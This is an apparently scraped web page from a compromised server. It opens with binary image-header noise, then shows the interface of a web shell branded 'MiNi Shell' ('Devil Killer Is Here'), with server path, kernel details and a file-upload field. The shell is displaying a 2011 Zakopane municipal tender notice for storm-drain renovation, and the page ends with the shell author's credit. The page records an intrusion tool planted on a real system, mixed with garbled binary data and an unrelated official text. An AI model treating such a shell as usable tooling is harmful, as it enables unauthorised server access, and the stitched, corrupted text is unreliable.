JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110603/143158-N-2011.html

<p class="kh_header"><b>Zakopane: BZP.271.30.2011Renowacja kanalizacji deszczowej w ciągu ul. Kościuszki oraz wykonanie usługi czyszczenia i monitoringu wizyjnego sieci kanalizacji deszczowej w ramach zadania inwestycyjnego nr 148/2011 Renowacja kanalizacji deszczowej w ciągu ul. Szymony w Zakopanem.</b><br>
<b>Numer ogłoszenia: 143158 - 2011; data zamieszczenia: 03.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.30.2011Renowacja kanalizacji deszczowej w ciągu ul. Kościuszki oraz wykonanie usługi czyszczenia i monitoringu wizyjnego sieci kanalizacji deszczowej w ramach zadania inwestycyjnego nr 148/2011 Renowacja kanalizacji deszczowej w ciągu ul. Szymony w Zakopanem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót  budowlanych polegających na renowacji kanalizacji deszczowej w II stanie technicznym, w ciągu ul. Kościuszki w ramach zadania nr 134/2011 Renowacja kanalizacji deszczowej w ciągu ul. Kościuszki oraz wykonanie usługi czyszczenia i monitoringu wizyjnego sieci kanalizacji deszczowej w ramach zadania inwestycyjnego nr 148/2011 Renowacja kanalizacji deszczowej w ciągu ul. Szymony w Zakopanem.


3.1.	W ramach zadania nr 134/2011 Renowacja kanalizacji deszczowej w ciągu   
 ul. Kościuszki na poszczególnych odcinkach:
3.1.1.od Ronda  Armii Krajowej do Potoku Bystry odcinek długości 
    około 256 mb, 
3.1.2.od budynku nr 45 do Potoku Bystry odcinek długości około 
     365 mb,
3.1.3.od ul Aleje 3 Maja do ul. Krupówki odcinek długości około129 mb.

3.2.	Zakres robót obejmuje:
3.2.1.	Czyszczenie odcinków kanalizacji z zalegającego osadu,
3.2.2.	wycinanie przyrostów korzeni,
3.2.3.	renowację kanalizacji deszczowej metodą bezwykopową Shortlining 
albo z zastosowaniem rękawa żywicznego lub przy użyciu metody równoważnej polegającej na bezwykopowej renowacji kanalizacji deszczowej,
3.2.4.	renowacja przyłączy,
3.2.5.	renowacja studni polegająca na uszczelnieniu specjalną chemią budowlaną powierzchni wewnętrznej kręgów lub odbudowa studni,
3.2.6.	inspekcję TV odcinków kanalizacji po wykonaniu renowacji,
3.2.7.	renowację bezwykopową odcinka przełamanej kanalizacji pomiędzy studzienką Dd2 do kolektora głównego kanalizacji w ul. Krupówki.



3.3.	W ramach zadania nr 148/2011 Renowacja kanalizacji deszczowej 
w ciągu ul. Szymony:
3.3.1.	wykonanie kompleksowego czyszczenia hydrodynamicznego sieci kanalizacji deszczowej o nieznanej średnicy, na długości około 500 mb,
3.3.2.	wycinka przerostów korzeni,
3.3.3.	przeprowadzenie przeglądu stanu technicznego kanalizacji opadowej 
na podstawie monitoringu i zakwalifikowanie odcinków kanalizacji 
do renowacji, budowy lub przebudowy, z podaniem trzech stanów technicznych tych odcinków (I stan techniczny - istniejący przewód zachowuje swoją nośność, dopuszczalne są drobne uszkodzenia, II stan techniczny -istniejący przewód - ośrodek gruntowy zachowuje zdolność do przenoszenia obciążeń, dopuszczalne są niewielkie ubytki, III stan techniczny -istniejący przewód - ośrodek gruntowy utracił zdolność do samodzielnego przenoszenia obciążeń),
3.3.4.	opracowanie obliczeń hydrotechnicznych,
3.3.5.	wykonanie inwentaryzacji oczyszczonej sieci kanalizacji deszczowej, 
na aktualnej mapie,
3.3.6.	sporządzenie specyfikacji wykonania i odbioru robót,
3.3.7.	sporządzenie kosztorysów inwestorskich w zależności od przyjętej metody renowacji,
3.3.8.	dostarczenie 1 egz. filmu na nośniku DVD i 2 egz. opracowania pisemnego,
3.3.9.	dostarczenie dokumentacji elektronicznej w formacie Word, PDF 
oraz dodatkowo kosztorys inwestorski w zapisie umożliwiającym odczyt 
w formacie Excel.

3.4.	Wykonawca dla każdego z zadań przed przystąpieniem do robót winien zgłosić zarządcy dróg zamiar prowadzenia robót w pasie drogowym i przedstawić schemat organizacji ruchu w celu zabezpieczenia robót.


3.5.	Wykonawca   udzieli co najmniej 36-cio miesięcznej gwarancji na wykonane roboty budowlane objęte przedmiotowym zamówieniem.

3.6.	Dokładny opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do niniejszej 
             siwz na który składa się :
        3.6.1. STWIOR
        3.6.2.  tabele elementów rozliczeniowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości  15.000,00     zł  ( słownie:  piętnaście  tysięcy  złotych)
11.2	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       11.2.1. pieniądzu;
       11.2.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                  oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
                  poręczeniem pieniężnym;
      11.2.3. poręczeniach bankowych;
      11.2.4. gwarancjach bankowych;
      11.2.5. gwarancjach ubezpieczeniowych;
      11.2.6. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
                5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
                 Rozwoju Przedsiębiorczości ((Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

11.3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
   Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 047481111000048718666   
    Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
    w terminie składania ofert tj. 22 czerwca 2011 r. do godz.  12°°

11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
        najpóźniej w terminie składania ofert tj. 22 czerwca 2011 r.do godz. 12°° w   
        Biurze    ds. zamówień publicznych pok. nr 8  (parter).
        
  11.4.1. UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

  11.5.   Zwrot wadium  
         11.5.1. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po 
                     wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z 
                     wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z 
                     zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
                     wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3ustawy       
                     nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1   
                     ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
                     nieleżących po jego stronie. 

      11.5.2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który 
                    wycofał ofertę przed upływem terminu składania ofert;
          11.5.3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym 
                      zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego  
                       rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza.     
                       Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
          11.5.4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami   
                      wynikającymi z umowy rachunku bankowego, na którym było ono  
                       przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego   
                       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
                       przez wykonawcę.
    
         11.5.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
                      oferta została wybrana:
     11.5.5.1. odmówił podpisania umowy w sprawie zamówienia publicznego na 
                    warunkach określonych w ofercie;
     11.5.5.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
              11.5.5.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe    
                             z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                     oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 5 lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej  2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj. robót budowlanych polegających na bezwykopowej renowacji kanalizacji deszczowej o wartości nie mniejszej niż 400 000,00 PLN (słownie: czterysta tysięcy PLN) każda oraz co najmniej 1 usługę polegającą na czyszczeniu i monitoringu kanalizacji deszczowej.

 Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia  
  lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                     oświadczenie
      Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  
  wykonanie zamówienia przez osobę, która posiada minimum 5-cio letnie doświadczenie w kierowaniu robotami polegającymi na bezwykopowej renowacji kanalizacji deszczowej 

 Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
  lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                     oświadczenie
  Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma do oferty załączyć wypełnione  tabele elementów rozliczeniowych (dla każdego zadania) stanowiące załącznik do siwz , które służyć będą  jedynie pomocniczo do sporządzenia oferty. Wypełnione przez oferenta będą załącznikiem do umowy i będą  służyć do wyliczenia zmniejszeń w przypadku niewykonania całego przedmiotu umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>32.1.	 W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy w przypadku:

32.1.1.	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
32.1.2.	wydłużenia terminu wykonania zamówienia spowodowanym wystąpieniem niesprzyjających warunków pogodowych uniemożliwiających wykonanie zamówienia zgodnie z warunkami określonymi w Specyfikacjach Technicznych Wykonania i Odbioru Robót lub wystąpienia innych okoliczności niezależnych od Wykonawcy,
32.1.3.	wystąpienia siły wyższej,
32.1.4.	zmian stawek podatku VAT,
32.1.5.	 zawieszenia robót przez Zamawiającego,
32.1.6.	termin wykonania zamówienia może  ulec przedłużeniu  w formie pisemnego aneksu do umowy, na pisemny  umotywowany wniosek wykonawcy w przypadku opóźnienia przez zamawiającego przekazania placu budowy lub dokumentacji.
32.1.7.	termin wykonania zamówienia może  ulec przedłużeniu  w formie aneksu do umowy, na pisemny umotywowany  wniosek wykonawcy w przypadku wystąpienia konieczności wykonania robót  dodatkowych lub zamiennych niezawinionych przez wykonawcę  uniemożliwiających terminowe wykonanie zamówienia podstawowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji pok.21
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2011 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com